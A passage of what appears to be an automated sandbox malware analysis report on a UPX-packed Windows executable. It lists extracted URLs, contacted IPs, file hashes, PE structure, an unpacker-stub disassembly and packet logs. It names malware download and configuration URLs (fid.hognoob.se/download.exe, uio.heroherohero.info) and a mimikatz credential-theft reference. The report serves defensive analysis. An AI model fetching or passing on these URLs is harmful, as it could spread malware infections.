fid.hognoob.se/download.exeC: | sqlisrv.exe, 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000C.00000002.6527504547.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp | true | Avira URL Cloud: safe | unknown
repository.certum.pl/ctnca.cer0 | sqlisrv.exe, 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000C.00000001.5206506082.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp | false | - | high
blog.gentilkiwi.com/mimikatz | sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp | false | - | high
www.zlib.net/D | sqlisrv.exe, 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000C.00000002.6527504547.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp | false | - | high
fid.hognoob.se/download.exe | sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp | false | - | high
subca.ocsp-certum.com01 | sqlisrv.exe, 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000C.00000001.5206506082.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp | false | - | high
w.w3. | sqlisrv.exe, 00000004.00000002.5101425693.0000000000401000.00000040.sdmp, b158ac7.exe, 0000000B.00000002.5202663261.0000000000401000.00000040.sdmp, b158ac7.exe, 0000000C.00000002.6527504547.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000002.5578674251.0000000000401000.00000040.sdmp | false | - | high
2019.ip138.com/ic.asp | sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp | false | - | high
uio.heroherohero.info:63145/cfg.ini | b158ac7.exe, sqlisrv.exe, 0000001B.00000002.5578674251.0000000000401000.00000040.sdmp | false | - | high
www.certum.pl/CPS0 | sqlisrv.exe, 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000C.00000001.5206506082.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp | false | - | high
fid.hognoob.se/download.execmd.exe | sqlisrv.exe, 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000C.00000002.6527504547.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp | true | Avira URL Cloud: safe | unknown
No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs
IP Country Flag ASN ASN Name Malicious
172.105.237.113 United States 63949 unknown false
172.104.161.101 United States 63949 unknown false
195.128.126.120 Russian Federation 47196 unknown false
IP
192.168.0.2
192.168.0.1
192.168.0.4
192.168.0.3
192.168.0.14
192.168.0.9
192.168.0.15
192.168.0.16
192.168.0.17
192.168.0.6
Contacted IPs
Public
Private
Copyright Joe Security LLC 2019 Page 32 of 69
192.168.0.18
192.168.0.5
192.168.0.19
192.168.0.8
192.168.0.7
192.168.0.20
192.168.0.21
192.168.0.22
192.168.0.23
192.168.0.24
192.168.0.10
192.168.0.11
192.168.0.12
192.168.0.13
192.168.0.170
192.168.0.172
192.168.0.171
192.168.0.58
192.168.0.59
192.168.0.61
192.168.0.62
192.168.0.63
192.168.0.64
192.168.0.65
192.168.0.66
192.168.0.67
192.168.0.68
192.168.0.178
192.168.0.177
192.168.0.179
192.168.0.174
192.168.0.173
192.168.0.176
192.168.0.60
192.168.0.175
192.168.0.161
192.168.0.160
192.168.0.47
192.168.0.48
192.168.0.49
192.168.0.50
192.168.0.51
192.168.0.52
192.168.0.53
192.168.0.54
192.168.0.55
192.168.0.56
192.168.0.57
192.168.0.167
192.168.0.166
192.168.0.169
192.168.0.168
192.168.0.163
192.168.0.162
127.0.0.1
192.168.0.165
192.168.0.164
192.168.0.192
192.168.0.191
192.168.0.194
192.168.0.193
192.168.0.190
192.168.0.36
192.168.0.37
IP
Copyright Joe Security LLC 2019 Page 33 of 69
Static File Info
GeneralFile type: PE32 executable (GUI) Intel 80386, for MS Windows,
UPX compressed
Entropy (8bit): 7.927054570350866
TrID: Win32 Executable (generic) a (10002005/4) 99.66%UPX compressed Win32 Executable (30571/9) 0.30%Generic Win/DOS Executable (2004/3) 0.02%DOS Executable Generic (2002/1) 0.02%Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: download.exe
File size: 322560
MD5: 31e46700743faa4304532b36311e1177
SHA1: 63e939ba9344836cd7e62fc0da531f421f96c645
SHA256: 364faa9f9bec15ad226a2b4a03869ec42ad5aa7f2d6c99c65690d4b1de48a0dc
SHA512: 7e75fd7ab1931be15841dcdcd774ab93680ecde9d95241fe13c593e8fbf29aa245f2a7ff29cc1f7590b6319da6d25ea558dad99853e925e62bc8026edb77b998
SSDEEP: 6144:wr3mS3XmD1Jx5LpCKN4NalDAmD+z0fH9rK5Bdd+qaggVM/EaG8v:wiS3g1Jx5LpbEYnM0FQ7abm/3
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*s$.n.JOn.JOn.JO..FOm.JO..DOE.JOX4@O..JO8.YOB.JOn.KO..JO..YOy.JOX4AO0.JO..AO>[email protected]'.JO..LOo.JORichn.JO........PE..L..
File Icon
Icon Hash: 00828e8e8686b000
Static PE Info
General
Entrypoint: 0x4dc1d0
Entrypoint Section: UPX1
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp: 0x5CD8F147 [Mon May 13 04:23:35 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: c2ee7d277580fccb850519e0885ea7e1
Entrypoint Preview
Instruction
pushad
mov esi, 0048E000h
lea edi, dword ptr [esi-0008D000h]
push edi
jmp 00007F093078760Dh
nop
mov al, byte ptr [esi]
inc esi
mov byte ptr [edi], al
inc edi
add ebx, ebx
jne 00007F0930787609h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F09307875EFh
mov eax, 00000001h
add ebx, ebx
jne 00007F0930787609h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
add ebx, ebx
jnc 00007F093078760Dh
jne 00007F093078762Ah
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F0930787621h
dec eax
add ebx, ebx
jne 00007F0930787609h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
jmp 00007F09307875D6h
add ebx, ebx
jne 00007F0930787609h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
jmp 00007F0930787654h
xor ecx, ecx
sub eax, 03h
jc 00007F0930787613h
shl eax, 08h
mov al, byte ptr [esi]
inc esi
xor eax, FFFFFFFFh
je 00007F0930787677h
sar eax, 1
mov ebp, eax
jmp 00007F093078760Dh
add ebx, ebx
jne 00007F0930787609h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F09307875CEh
inc ecx
add ebx, ebx
jne 00007F0930787609h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F09307875C0h
add ebx, ebx
jne 00007F0930787609h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
add ebx, ebx
jnc 00007F09307875F1h
jne 00007F093078760Bh
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jnc 00007F09307875E6h
add ecx, 02h
cmp ebp, FFFFFB00h
adc ecx, 02h
lea edx, dword ptr [edi+ebp]
cmp ebp, FFFFFFFCh
jbe 00007F0930787610h
mov al, byte ptr [edx]
Rich Headers
Programming Language:
• [C++] VS98 (6.0) SP6 build 8804
• [C++] VS98 (6.0) build 8168
• [EXP] VC++ 6.0 SP5 build 8804
• [ C ] VS98 (6.0) SP6 build 8804
• [ C ] VS98 (6.0) build 8168
Data Directories
Name Virtual Address Virtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT 0x0 0x0
IMAGE_DIRECTORY_ENTRY_IMPORT 0xdd000 0x314 UPX2
IMAGE_DIRECTORY_ENTRY_RESOURCE 0x0 0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION 0x0 0x0
IMAGE_DIRECTORY_ENTRY_SECURITY 0x0 0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC 0x0 0x0
IMAGE_DIRECTORY_ENTRY_DEBUG 0x0 0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT 0x0 0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR 0x0 0x0
IMAGE_DIRECTORY_ENTRY_TLS 0x0 0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG 0x0 0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT 0x0 0x0
IMAGE_DIRECTORY_ENTRY_IAT 0x0 0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT 0x0 0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR 0x0 0x0
IMAGE_DIRECTORY_ENTRY_RESERVED 0x0 0x0
Sections
Name Virtual Address Virtual Size Raw Size Xored PE ZLIB Complexity File Type Entropy Characteristics
UPX0 0x1000 0x8d000 0x0 False 0 empty 0.0 IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
UPX1 0x8e000 0x4f000 0x4e400 False 0.99159781849 data 7.93228374473 IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
UPX2 0xdd000 0x1000 0x400 False 0.3818359375 data 3.35216759537 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
Imports
DLL Import
ADVAPI32.dll RegCloseKey
COMCTL32.dll
comdlg32.dll ChooseColorA
GDI32.dll PatBlt
KERNEL32.DLL LoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect
ole32.dll OleInitialize
OLEAUT32.dll LoadTypeLib
RASAPI32.dll RasHangUpA
SHELL32.dll ShellExecuteA
USER32.dll GetDC
WININET.dll InternetOpenA
WINMM.dll waveOutOpen
WINSPOOL.DRV OpenPrinterA
WS2_32.dll inet_ntoa
Network Behavior
Network Port Distribution
Total Packets: 91
• 53 (DNS)
• 9456 undefined
• 80 (HTTP)
TCP Packets
Timestamp Source Port Dest Port Source IP Dest IP
May 16, 2019 17:15:39.132663965 CEST 49797 80 192.168.2.5 45.67.14.164
May 16, 2019 17:15:39.180200100 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.183634996 CEST 49798 9456 192.168.2.5 23.106.122.2
May 16, 2019 17:15:39.183851957 CEST 49797 80 192.168.2.5 45.67.14.164
May 16, 2019 17:15:39.184736013 CEST 49797 80 192.168.2.5 45.67.14.164
May 16, 2019 17:15:39.233027935 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.233145952 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.233315945 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.233326912 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.233336926 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.233350992 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.233360052 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.233367920 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.233536959 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.233547926 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.233556986 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.238857985 CEST 49797 80 192.168.2.5 45.67.14.164
May 16, 2019 17:15:39.239150047 CEST 49797 80 192.168.2.5 45.67.14.164
May 16, 2019 17:15:39.286458015 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.286477089 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.286485910 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.286504030 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.286513090 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.286595106 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.286619902 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.286629915 CEST 49797 80 192.168.2.5 45.67.14.164
May 16, 2019 17:15:39.286633015 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.286649942 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.286689997 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.286703110 CEST 49797 80 192.168.2.5 45.67.14.164
May 16, 2019 17:15:39.286705971 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.286756039 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.286761045 CEST 49797 80 192.168.2.5 45.67.14.164
May 16, 2019 17:15:39.286775112 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.286803007 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.286818981 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.286834002 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.286859989 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.286875010 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.286890984 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.286906004 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.287177086 CEST 49797 80 192.168.2.5 45.67.14.164
May 16, 2019 17:15:39.335172892 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335196972 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335212946 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335227013 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335242033 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335257053 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335303068 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335318089 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335328102 CEST 49797 80 192.168.2.5 45.67.14.164
May 16, 2019 17:15:39.335333109 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335356951 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335393906 CEST 49797 80 192.168.2.5 45.67.14.164
May 16, 2019 17:15:39.335417032 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335433006 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335448027 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335474968 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335489988 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335505962 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335535049 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335570097 CEST 49797 80 192.168.2.5 45.67.14.164
May 16, 2019 17:15:39.335597038 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335612059 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335627079 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335640907 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335655928 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335690022 CEST 49797 80 192.168.2.5 45.67.14.164
May 16, 2019 17:15:39.335712910 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335728884 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335742950 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335757971 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335772991 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335802078 CEST 49797 80 192.168.2.5 45.67.14.164
May 16, 2019 17:15:39.335834980 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335850000 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335863113 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335876942 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335891962 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335920095 CEST 49797 80 192.168.2.5 45.67.14.164
May 16, 2019 17:15:39.335956097 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335971117 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335985899 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335999966 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.336013079 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.336036921 CEST 49797 80 192.168.2.5 45.67.14.164
May 16, 2019 17:15:39.336071968 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.336086988 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.336102009 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.336457014 CEST 49797 80 192.168.2.5 45.67.14.164
May 16, 2019 17:15:39.346796036 CEST 9456 49798 23.106.122.2 192.168.2.5
May 16, 2019 17:15:39.382832050 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.382937908 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.382958889 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.382980108 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.382998943 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.383064985 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.383124113 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.383143902 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.383162975 CEST 80 49797 45.67.14.164 192.168.2.5
UDP Packets
Timestamp Source Port Dest Port Source IP Dest IP
May 16, 2019 17:15:39.070086956 CEST 58937 53 192.168.2.5 8.8.8.8
May 16, 2019 17:15:39.110205889 CEST 53 58937 8.8.8.8 192.168.2.5
May 16, 2019 17:15:39.144161940 CEST 62548 53 192.168.2.5 8.8.8.8
May 16, 2019 17:15:39.171838999 CEST 53 62548 8.8.8.8 192.168.2.5
May 16, 2019 17:15:40.738154888 CEST 53311 53 192.168.2.5 8.8.8.8
May 16, 2019 17:15:40.765496016 CEST 53 53311 8.8.8.8 192.168.2.5
May 16, 2019 17:15:42.426970959 CEST 54455 53 192.168.2.5 8.8.8.8
May 16, 2019 17:15:42.460274935 CEST 53 54455 8.8.8.8 192.168.2.5
May 16, 2019 17:15:44.085347891 CEST 54772 53 192.168.2.5 8.8.8.8
May 16, 2019 17:15:44.124200106 CEST 53 54772 8.8.8.8 192.168.2.5
May 16, 2019 17:15:44.132404089 CEST 58460 53 192.168.2.5 8.8.8.8
May 16, 2019 17:15:44.177515984 CEST 53 58460 8.8.8.8 192.168.2.5
May 16, 2019 17:15:45.823421955 CEST 58876 53 192.168.2.5 8.8.8.8
May 16, 2019 17:15:45.850907087 CEST 53 58876 8.8.8.8 192.168.2.5
May 16, 2019 17:15:46.941581011 CEST 58501 53 192.168.2.5 8.8.8.8
May 16, 2019 17:15:47.003392935 CEST 53 58501 8.8.8.8 192.168.2.5
May 16, 2019 17:15:47.482274055 CEST 53388 53 192.168.2.5 8.8.8.8
May 16, 2019 17:15:47.510266066 CEST 53 53388 8.8.8.8 192.168.2.5
May 16, 2019 17:15:50.849494934 CEST 58724 53 192.168.2.5 8.8.8.8
May 16, 2019 17:15:50.876676083 CEST 53 58724 8.8.8.8 192.168.2.5
May 16, 2019 17:15:52.489936113 CEST 60822 53 192.168.2.5 8.8.8.8
May 16, 2019 17:15:52.517611027 CEST 53 60822 8.8.8.8 192.168.2.5
May 16, 2019 17:15:53.103890896 CEST 58429 53 192.168.2.5 8.8.8.8
May 16, 2019 17:15:53.131223917 CEST 53 58429 8.8.8.8 192.168.2.5
May 16, 2019 17:15:53.375061035 CEST 55467 53 192.168.2.5 8.8.8.8
May 16, 2019 17:15:53.403254986 CEST 53 55467 8.8.8.8 192.168.2.5
May 16, 2019 17:15:53.576452971 CEST 52386 53 192.168.2.5 8.8.8.8
May 16, 2019 17:15:53.603751898 CEST 53 52386 8.8.8.8 192.168.2.5
May 16, 2019 17:15:54.214173079 CEST 64452 53 192.168.2.5 8.8.8.8
May 16, 2019 17:15:54.274655104 CEST 53 64452 8.8.8.8 192.168.2.5
May 16, 2019 17:15:55.937410116 CEST 57162 53 192.168.2.5 8.8.8.8
May 16, 2019 17:15:55.964837074 CEST 53 57162 8.8.8.8 192.168.2.5
May 16, 2019 17:15:57.639635086 CEST 63777 53 192.168.2.5 8.8.8.8
May 16, 2019 17:15:57.666914940 CEST 53 63777 8.8.8.8 192.168.2.5
May 16, 2019 17:15:59.347651005 CEST 52431 53 192.168.2.5 8.8.8.8
May 16, 2019 17:15:59.374690056 CEST 53 52431 8.8.8.8 192.168.2.5
May 16, 2019 17:16:01.130189896 CEST 62217 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:01.157440901 CEST 53 62217 8.8.8.8 192.168.2.5
May 16, 2019 17:16:02.812659025 CEST 57684 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:02.839837074 CEST 53 57684 8.8.8.8 192.168.2.5
May 16, 2019 17:16:04.547229052 CEST 52990 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:04.574561119 CEST 53 52990 8.8.8.8 192.168.2.5
May 16, 2019 17:16:06.240150928 CEST 49515 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:06.274620056 CEST 53 49515 8.8.8.8 192.168.2.5
May 16, 2019 17:16:08.306943893 CEST 61794 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:08.335238934 CEST 53 61794 8.8.8.8 192.168.2.5
May 16, 2019 17:16:12.969938040 CEST 58256 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:13.009057045 CEST 53 58256 8.8.8.8 192.168.2.5
May 16, 2019 17:16:14.651127100 CEST 59078 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:14.664491892 CEST 53 59078 8.8.8.8 192.168.2.5
May 16, 2019 17:16:21.065387964 CEST 53453 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:21.092657089 CEST 53 53453 8.8.8.8 192.168.2.5
May 16, 2019 17:16:22.791235924 CEST 56313 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:22.818922043 CEST 53 56313 8.8.8.8 192.168.2.5
May 16, 2019 17:16:24.500495911 CEST 50140 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:24.528129101 CEST 53 50140 8.8.8.8 192.168.2.5
May 16, 2019 17:16:26.195426941 CEST 63107 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:26.223279953 CEST 53 63107 8.8.8.8 192.168.2.5
May 16, 2019 17:16:31.800149918 CEST 60885 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:31.827606916 CEST 53 60885 8.8.8.8 192.168.2.5
May 16, 2019 17:16:33.498259068 CEST 51827 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:33.529900074 CEST 53 51827 8.8.8.8 192.168.2.5
May 16, 2019 17:16:35.433422089 CEST 54050 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:35.461162090 CEST 53 54050 8.8.8.8 192.168.2.5
May 16, 2019 17:16:37.098253012 CEST 50611 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:37.125576019 CEST 53 50611 8.8.8.8 192.168.2.5
May 16, 2019 17:16:38.811672926 CEST 62388 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:38.825573921 CEST 53 62388 8.8.8.8 192.168.2.5
May 16, 2019 17:16:40.479717970 CEST 59412 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:40.507721901 CEST 53 59412 8.8.8.8 192.168.2.5
May 16, 2019 17:16:42.138859034 CEST 50860 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:42.166168928 CEST 53 50860 8.8.8.8 192.168.2.5
May 16, 2019 17:16:43.855046988 CEST 57540 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:43.885386944 CEST 53 57540 8.8.8.8 192.168.2.5
May 16, 2019 17:16:45.574423075 CEST 50779 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:45.601716042 CEST 53 50779 8.8.8.8 192.168.2.5
May 16, 2019 17:16:47.304636002 CEST 51380 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:47.331859112 CEST 53 51380 8.8.8.8 192.168.2.5
May 16, 2019 17:16:48.977777004 CEST 60707 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:48.991177082 CEST 53 60707 8.8.8.8 192.168.2.5
May 16, 2019 17:16:50.642930031 CEST 49386 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:50.674896002 CEST 53 49386 8.8.8.8 192.168.2.5
May 16, 2019 17:16:54.067745924 CEST 64896 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:54.095082998 CEST 53 64896 8.8.8.8 192.168.2.5
May 16, 2019 17:16:55.747817039 CEST 55090 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:55.761073112 CEST 53 55090 8.8.8.8 192.168.2.5
May 16, 2019 17:16:57.391441107 CEST 49816 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:57.418710947 CEST 53 49816 8.8.8.8 192.168.2.5
May 16, 2019 17:17:01.390713930 CEST 51260 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:01.417872906 CEST 53 51260 8.8.8.8 192.168.2.5
May 16, 2019 17:17:03.132452011 CEST 59500 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:03.145778894 CEST 53 59500 8.8.8.8 192.168.2.5
May 16, 2019 17:17:04.779526949 CEST 53889 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:04.793451071 CEST 53 53889 8.8.8.8 192.168.2.5
May 16, 2019 17:17:06.519885063 CEST 57689 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:06.533390999 CEST 53 57689 8.8.8.8 192.168.2.5
May 16, 2019 17:17:08.173060894 CEST 63557 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:08.200413942 CEST 53 63557 8.8.8.8 192.168.2.5
May 16, 2019 17:17:09.854626894 CEST 63582 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:09.887250900 CEST 53 63582 8.8.8.8 192.168.2.5
May 16, 2019 17:17:11.532763004 CEST 59287 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:11.546127081 CEST 53 59287 8.8.8.8 192.168.2.5
May 16, 2019 17:17:13.209136009 CEST 57502 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:13.222455025 CEST 53 57502 8.8.8.8 192.168.2.5
May 16, 2019 17:17:19.505327940 CEST 57600 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:19.532576084 CEST 53 57600 8.8.8.8 192.168.2.5
May 16, 2019 17:17:21.178663969 CEST 57426 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:21.206109047 CEST 53 57426 8.8.8.8 192.168.2.5
May 16, 2019 17:17:22.856798887 CEST 53451 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:22.870672941 CEST 53 53451 8.8.8.8 192.168.2.5
May 16, 2019 17:17:24.610611916 CEST 65030 53 192.168.2.5 8.8.8.8
